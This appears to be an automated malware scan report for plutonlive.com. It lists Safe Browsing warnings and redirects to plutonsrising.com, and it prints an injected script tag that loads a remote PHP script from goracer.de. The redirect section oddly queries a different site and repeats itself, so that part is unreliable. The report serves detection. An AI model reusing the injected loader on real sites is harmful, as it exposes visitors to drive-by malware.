Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=plutonlive.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gallerylofts.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 Oct 2015 06:41:31 GMT
Server: nginx/1.8.0
Content-Type: text/html
GET / HTTP/1.1
Host: gallerylofts.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 Oct 2015 06:41:31 GMT
Server: nginx/1.8.0
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: gallerylofts.com
Referer: http://www.google.com/search?q=gallerylofts.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gallerylofts.com
Referer: http://www.google.com/search?q=gallerylofts.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://plutonlive.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:07 GMT Location: http://www.plutonsrising.com/xavier.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047007403; path=/; expires=Wed, 14-Jan-2015 15:02:21 GMT | malicious |
http://www.plutonsrising.com/xavier.html | 200 OK Content-Length: 12751 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://goehren20.goracer.de/qx82pfmd.php?id=1603192"></script> | ||
http://www.plutonsrising.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 14118 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) Antivirus reports:
| ||
http://plutonlive.com/index.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:08 GMT Location: http://www.plutonsrising.com/xavier.html/index.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047006314; path=/; expires=Wed, 14-Jan-2015 15:04:19 GMT | malicious |
http://www.plutonsrising.com/xavier.html/index.html | 404 Not Found Content-Length: 220 Content-Type: text/html | clean |
http://www.plutonsrising.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://plutonlive.com/informations.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:09 GMT Location: http://www.plutonsrising.com/xavier.html/informations.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047006314; path=/; expires=Wed, 14-Jan-2015 15:04:19 GMT | malicious |
http://www.plutonsrising.com/xavier.html/informations.html | 404 Not Found Content-Length: 227 Content-Type: text/html | clean |
http://plutonlive.com/videos.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:09 GMT Location: http://www.plutonsrising.com/xavier.html/videos.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047006314; path=/; expires=Wed, 14-Jan-2015 15:15:53 GMT | malicious |
http://www.plutonsrising.com/xavier.html/videos.html | 404 Not Found Content-Length: 221 Content-Type: text/html | clean |
http://plutonlive.com/projets.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:10 GMT Location: http://www.plutonsrising.com/xavier.html/projets.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047006314; path=/; expires=Wed, 14-Jan-2015 15:04:19 GMT | malicious |
http://www.plutonsrising.com/xavier.html/projets.html | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://plutonlive.com/liens.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:10 GMT Location: http://www.plutonsrising.com/xavier.html/liens.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047009581; path=/; expires=Wed, 14-Jan-2015 15:02:21 GMT | malicious |
http://www.plutonsrising.com/xavier.html/liens.html | 404 Not Found Content-Length: 220 Content-Type: text/html | clean |
http://plutonlive.com/xavier.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:10 GMT Location: http://www.plutonsrising.com/xavier.html/xavier.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047009581; path=/; expires=Wed, 14-Jan-2015 15:15:53 GMT | malicious |
http://www.plutonsrising.com/xavier.html/xavier.html | 404 Not Found Content-Length: 221 Content-Type: text/html | clean |
http://plutonlive.com/le-bateau.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:10 GMT Location: http://www.plutonsrising.com/xavier.html/le-bateau.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047008492; path=/; expires=Wed, 14-Jan-2015 15:16:44 GMT | malicious |
http://www.plutonsrising.com/xavier.html/le-bateau.html | 404 Not Found Content-Length: 224 Content-Type: text/html | clean |
http://plutonlive.com/touchable.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:11 GMT Location: http://www.plutonsrising.com/xavier.html/touchable.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047009581; path=/; expires=Wed, 14-Jan-2015 15:15:53 GMT | malicious |
http://www.plutonsrising.com/xavier.html/touchable.html | 404 Not Found Content-Length: 224 Content-Type: text/html | clean |
http://plutonlive.com/dysharmonie.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:11 GMT Location: http://www.plutonsrising.com/xavier.html/dysharmonie.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047010670; path=/; expires=Wed, 14-Jan-2015 15:16:44 GMT | malicious |
http://www.plutonsrising.com/xavier.html/dysharmonie.html | 404 Not Found Content-Length: 226 Content-Type: text/html | clean |
http://plutonlive.com/comic-on.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:11 GMT Location: http://www.plutonsrising.com/xavier.html/comic-on.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047010670; path=/; expires=Wed, 14-Jan-2015 15:04:19 GMT | malicious |
http://www.plutonsrising.com/xavier.html/comic-on.html | 404 Not Found Content-Length: 223 Content-Type: text/html | clean |
http://plutonlive.com/lost-highway.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:11 GMT Location: http://www.plutonsrising.com/xavier.html/lost-highway.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047006314; path=/; expires=Wed, 14-Jan-2015 15:04:19 GMT | malicious |
http://www.plutonsrising.com/xavier.html/lost-highway.html | 404 Not Found Content-Length: 227 Content-Type: text/html | clean |
http://plutonlive.com/endless.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:12 GMT Location: http://www.plutonsrising.com/xavier.html/endless.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047008492; path=/; expires=Wed, 14-Jan-2015 15:15:53 GMT | malicious |
http://www.plutonsrising.com/xavier.html/endless.html | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |